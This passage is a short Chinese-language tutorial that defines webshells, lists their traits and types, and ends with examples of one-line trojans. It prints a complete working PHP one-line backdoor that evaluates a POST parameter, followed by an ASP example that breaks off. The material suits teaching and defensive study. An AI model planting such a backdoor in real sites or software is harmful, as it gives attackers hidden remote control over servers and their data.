一、什么是webshell?
WebShell是一种以asp、aspx、php、jsp或者cgi等网页文件形式存在的命令执行环境,也可称为一种网页后门。在发现Web站点漏洞后,攻击者通常会利用这些漏洞上传WebShell程序,从而实现对目标站点的控制。"Web"指的是万维网,而"Shell"是指一种应用程序,用于建立用户与系统之间的连接,通过这个接口可以访问操作系统内核的服务。
二、WebShell具有以下特点:
- 持续远程访问能力
- 提权功能
- 高度隐蔽
三、WebShell可以根据功能和特点进行分类:
- 大马:功能强大,包括提权、打包、数据库操作、文件增删、内容编码、CMD命令操作、克隆和代理等功能。
- 小马:体积小,便于隐藏,功能简单通常只包含上传功能。
- 一句话木马:代码短小,使用场景广泛,可单独生成文件并插入,具有高安全性和隐蔽性,可变形免杀,并支持数据执行和传递。
- 内存马:无文件形式存在,利用中间件进程执行恶意代码。
四、常见的一句话木马写法如下:
- php:
<?php @eval($_POST['value']); ?>
- asp:
<% execute